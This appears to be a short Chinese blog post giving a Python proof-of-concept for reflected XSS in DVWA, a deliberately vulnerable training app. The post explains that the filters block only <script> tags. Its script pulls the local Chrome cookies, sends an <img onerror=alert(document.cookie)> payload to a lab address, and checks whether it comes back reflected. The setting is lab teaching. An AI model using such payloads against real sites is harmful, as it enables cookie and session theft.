POC——DVWA's XSS Reflected
XSS反射型中,三个等级内全都只定义了对<script>标签的过滤,所以通用一个<img>标签即可~
1 import requests 2 import browser_cookie3 3 from urllib import parse 4 5 cookie = browser_cookie3.chrome() 6 text1 = '<img src=1 onerror=alert(document.cookie)>' 7 string1 = parse.quote(text1) 8 url = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/xss_r/?name='+string1 9 response = requests.get(url=url,cookies=cookie) 10 11 re = 'document.cookie' 12 flag=re in str(response.content) 13 14 if flag: 15 print("It looks likely vulnerable") 16 else: 17 print("It is strong")
此处没有必要一定要把请求url编码,在这里只是想加一下而已~
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码